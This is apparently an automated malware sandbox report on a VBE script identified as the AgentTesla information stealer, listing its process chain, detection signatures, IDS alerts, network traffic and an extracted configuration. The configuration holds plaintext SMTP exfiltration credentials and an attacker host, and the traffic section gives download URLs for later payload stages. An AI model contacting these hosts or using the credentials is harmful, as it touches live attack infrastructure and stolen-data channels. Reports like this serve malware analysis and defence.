
Windows Analysis Report
Ref#150689.vbe

Overview

General Information

Sample name: Ref#150689.vbe
Analysis ID: 1539284
MD5: 3ee57f19875a1b263377d8ab4af8f677
SHA1: 619eec8b7c7a819a87959fd9026dc58dfe965e68
SHA256: 3fa9114a2d3fddc77550a3567cac63db1bf0c72bebe23d9ceed62cf47ea68c34
Tags: SPAM-ITA, vbe, user-JAMESWT_MHT

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AgentTesla
AI detected suspicious sample
Injects a PE file into a foreign processes
Potential evasive VBS script found (sleep loop)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Sigma detected: WScript or CScript Dropper - File
Suspicious execution chain found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows Shell Script Host drops VBS files
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 6200 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Ref#150689.vbe" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • wscript.exe (PID: 6580 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\dirDChDJoZeRjid.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 6804 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • RegSvcs.exe (PID: 6176 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • wermgr.exe (PID: 2764 cmdline: "C:\Windows\system32\wermgr.exe" "-outproc" "0" "6804" "2876" "2568" "2880" "0" "0" "2884" "0" "0" "0" "0" "0" MD5: 74A0194782E039ACE1F7349544DC1CF4)
    • powershell.exe (PID: 4676 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wermgr.exe (PID: 1436 cmdline: "C:\Windows\system32\wermgr.exe" "-outproc" "0" "4676" "1988" "2556" "2192" "0" "0" "2124" "0" "0" "0" "0" "0" MD5: 74A0194782E039ACE1F7349544DC1CF4)
  • cleanup
Threat name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "162.254.34.31", "Username": "sendxambro@educt.shop", "Password": "ABwuRZS5Mjh5"}
Yara matches (Source | Rule | Description | Author; matched strings listed beneath the rule where the report shows them):

PCAP:
dump.pcap | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

Memory dumps:
00000008.00000002.3315071411.0000000002701000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000008.00000002.3315071411.0000000002701000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000008.00000002.3312540356.0000000000372000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000008.00000002.3312540356.0000000000372000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000008.00000002.3315071411.0000000002727000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

Unpacked PE files:
8.2.RegSvcs.exe.370000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
8.2.RegSvcs.exe.370000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
8.2.RegSvcs.exe.370000.0.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen
  • 0x3347b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x334ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x33577:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x33609:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x33673:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x336e5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x3377b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x3380b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548

AMSI scan buffers:
amsi64_6804.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
  • 0xc137:$b2: ::FromBase64String(
  • 0xbda3:$s1: -join
  • 0xc14b:$s1: -join
  • 0x554f:$s4: +=
  • 0x5611:$s4: +=
  • 0x9838:$s4: +=
  • 0xb955:$s4: +=
  • 0xbc3f:$s4: +=
  • 0xbd85:$s4: +=
  • 0xe338:$s4: +=
  • 0xe3b8:$s4: +=
  • 0xe47e:$s4: +=
  • 0xe4fe:$s4: +=
  • 0xe6d4:$s4: +=
  • 0xe758:$s4: +=
  • 0xc55f:$e4: Get-WmiObject
  • 0xc74e:$e4: Get-Process
  • 0xc7a6:$e4: Start-Process

System Summary

Sigma matches:
Source: Network Connection | Author: frack113, Florian Roth | Data: DestinationIp: 144.91.79.54, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6200, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49705
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Ref#150689.vbe", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Ref#150689.vbe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Ref#150689.vbe", ProcessId: 6200, ProcessName: wscript.exe
Source: File created | Author: Tim Shelton | Data: EventID: 11, Image: C:\Windows\System32\wscript.exe, ProcessId: 6200, TargetFilename: C:\Users\user\AppData\Roaming\dirDChDJoZeRjid.vbs
Source: Network Connection | Author: frack113 | Data: DestinationIp: 144.91.79.54, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6200, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49705
Source: Network Connection | Author: frack113 | Data: DestinationIp: 162.254.34.31, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 6176, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49764
Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Ref#150689.vbe", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Ref#150689.vbe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Ref#150689.vbe", ProcessId: 6200, ProcessName: wscript.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" , CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\dirDChDJoZeRjid.vbs" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6580, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" , ProcessId: 6804, ProcessName: powershell.exe

Suricata IDS alerts:
Timestamp                        SID      Severity  Classtype                      Source IP    Source Port  Destination IP  Destination Port  Protocol
2024-10-22T14:45:59.281919+0200  2030171  1         A Network Trojan was detected  192.168.2.5  49764        162.254.34.31   587               TCP
2024-10-22T14:46:31.537759+0200  2855542  1         A Network Trojan was detected  192.168.2.5  49764        162.254.34.31   587               TCP
2024-10-22T14:46:31.537759+0200  2855245  1         A Network Trojan was detected  192.168.2.5  49764        162.254.34.31   587               TCP
2024-10-22T14:45:59.281919+0200  2840032  1         A Network Trojan was detected  192.168.2.5  49764        162.254.34.31   587               TCP


AV Detection

Source: 8.2.RegSvcs.exe.370000.0.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "162.254.34.31", "Username": "sendxambro@educt.shop", "Password": "ABwuRZS5Mjh5"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.7% probability
Source: unknown | HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49751 version: TLS 1.2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData

Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Source: Network traffic | Suricata IDS: 2855245 - Severity 1 - ETPRO MALWARE Agent Tesla Exfil via SMTP : 192.168.2.5:49764 -> 162.254.34.31:587
Source: Network traffic | Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.5:49764 -> 162.254.34.31:587
Source: Network traffic | Suricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.5:49764 -> 162.254.34.31:587
Source: Network traffic | Suricata IDS: 2840032 - Severity 1 - ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 : 192.168.2.5:49764 -> 162.254.34.31:587
Source: C:\Windows\System32\wscript.exe | Network Connect: 144.91.79.54 80
Source: global traffic | TCP traffic: 192.168.2.5:49764 -> 162.254.34.31:587
Source: Joe Sandbox View | IP Address: 144.91.79.54 144.91.79.54
Source: Joe Sandbox View | IP Address: 104.26.13.205 104.26.13.205
Source: Joe Sandbox View | ASN Name: CONTABODE CONTABODE
Source: Joe Sandbox View | ASN Name: VIVIDHOSTINGUS VIVIDHOSTINGUS
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: api.ipify.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 | Host: api.ipify.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /1210/s HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: 144.91.79.54
Source: global traffic | HTTP traffic detected: GET /1210/r HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: 144.91.79.54
Source: global traffic | HTTP traffic detected: GET /1210/thEh4UQ3nf0RsZGPSynf.txt HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: 144.91.79.54
Source: global traffic | HTTP traffic detected: GET /1210/v HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: 144.91.79.54
Source: global traffic | HTTP traffic detected: GET /1210/file HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: 144.91.79.54
Source: unknown | TCP traffic detected without corresponding DNS query: 144.91.79.54 (50 identical entries)
Source: global traffic | DNS traffic detected: DNS query: api.ipify.org
Source: wscript.exe, 00000000.00000003.2093238088.000001E896768000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2075029116.000001E89676D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.91.79.54/
Source: wscript.exe, 00000000.00000003.2079284658.000001E896768000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2087806504.000001E896768000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2075029116.000001E89676D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.91.79.54/$
Source: wscript.exe, 00000000.00000003.2079284658.000001E896768000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.91.79.54/0G
Source: wscript.exe, 00000000.00000003.2100463211.000001E89670E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2101869677.000001E89671E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2102363632.000001E896720000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2103065879.000001E896720000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.91.79.54/1210/
Source: wscript.exe, 00000000.00000003.2100463211.000001E89670E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2101869677.000001E89671E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2102363632.000001E896720000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2103065879.000001E896720000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.91.79.54/1210/8
Source: wscript.exe, 00000000.00000003.2099149868.000001E898588000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2101373201.000001E896798000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2100564601.000001E89858F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.91.79.54/1210/file
Source: wscript.exe, 00000000.00000003.2079284658.000001E896768000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2087806504.000001E896768000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2079284658.000001E89675B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.91.79.54/1210/r
Source: wscript.exe, 00000000.00000002.2103647837.000001E896786000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2100052014.000001E89677D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2101890507.000001E896786000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2100684872.000001E89677D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2087672638.000001E896780000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2079284658.000001E896783000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2089344734.000001E896780000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2088250036.000001E89858A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2093193510.000001E896783000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2089022857.000001E89677D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2074981941.000001E896783000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2101298327.000001E896785000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.91.79.54/1210/s
Source: wscript.exe, 00000000.00000003.2087672638.000001E896780000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2089344734.000001E896780000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2089022857.000001E896768000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2089375576.000001E896768000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2087806504.000001E896768000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2089022857.000001E89677D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2093238088.000001E896768000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.91.79.54/1210/thEh4UQ3nf0RsZGPSynf.txt
Source: wscript.exe, 00000000.00000003.2093238088.000001E89675B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2104531570.000001E898825000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2102491620.00000007D56F1000.00000004.00000010.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2099250622.000001E896A98000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2099149868.000001E898588000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2093238088.000001E896768000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.91.79.54/1210/v
Source: wscript.exe, 00000000.00000002.2103647837.000001E896786000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2100052014.000001E89677D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2101890507.000001E896786000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2100684872.000001E89677D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2093193510.000001E896783000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2101298327.000001E896785000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.91.79.54/1210/v8
Source: wscript.exe, 00000000.00000003.2093238088.000001E89675B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.91.79.54/1210/vs
Source: wscript.exe, 00000000.00000003.2079284658.000001E896768000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2075029116.000001E89676D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.91.79.54/8
Source: wscript.exe, 00000000.00000003.2100684872.000001E896790000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2101890507.000001E896790000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2103647837.000001E896790000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2099439406.000001E896790000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.91.79.54/BA;0
Source: wscript.exe, 00000000.00000003.2079284658.000001E896768000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2089022857.000001E896768000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2089375576.000001E896768000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2087806504.000001E896768000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2093238088.000001E896768000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.91.79.54/D
Source: wscript.exe, 00000000.00000003.2075029116.000001E89676D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.91.79.54/L
Source: wscript.exe, 00000000.00000003.2089022857.000001E896768000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2089375576.000001E896768000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2087806504.000001E896768000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2093238088.000001E896768000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.91.79.54/P
Source: wscript.exe, 00000000.00000003.2087806504.000001E896768000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.91.79.54/T
Source: wscript.exe, 00000000.00000003.2087806504.000001E896768000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.91.79.54/e4
Source: wscript.exe, 00000000.00000003.2089022857.000001E896768000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2089375576.000001E896768000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2087806504.000001E896768000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2093238088.000001E896768000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.91.79.54/l
Source: wscript.exe, 00000000.00000003.2098255050.000001E8967A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2097077335.000001E8967A7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.91.79.54:80/1210/file
Source: wscript.exe, 00000000.00000003.2100052014.000001E89677D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2100684872.000001E89677D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2087672638.000001E896780000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2089344734.000001E896780000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2093193510.000001E896783000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2089022857.000001E89677D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2101298327.000001E896785000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.91.79.54:80/1210/thEh4UQ3nf0RsZGPSynf.txtx
Source: wscript.exe, 00000000.00000003.2100684872.000001E896790000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2099439406.000001E896790000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2101373201.000001E896798000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://schemas.micro
Source: RegSvcs.exe, 00000008.00000002.3315071411.00000000026B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegSvcs.exe, 00000008.00000002.3312540356.0000000000372000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://account.dyn.com/
Source: RegSvcs.exe, 00000008.00000002.3312540356.0000000000372000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.3315071411.00000000026B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org
                  Source: RegSvcs.exe, 00000008.00000002.3315071411.00000000026B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                  Source: RegSvcs.exe, 00000008.00000002.3315071411.00000000026B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                  Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49751 version: TLS 1.2

                  System Summary

Source: amsi64_6804.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution. Author: ditekSHen
Source: 8.2.RegSvcs.exe.370000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers. Author: ditekSHen
Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\wscript.exe | COM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495}
Source: C:\Windows\System32\wscript.exe | COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0097E270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_00974A98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0097AA12
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_00973E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_009741C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0604A178
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_06055640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_06056668
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0605C200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0605B2A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_06053100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_06057DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_06057710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_06052409
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0605E418
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_06050040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_06055D5F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_06050006
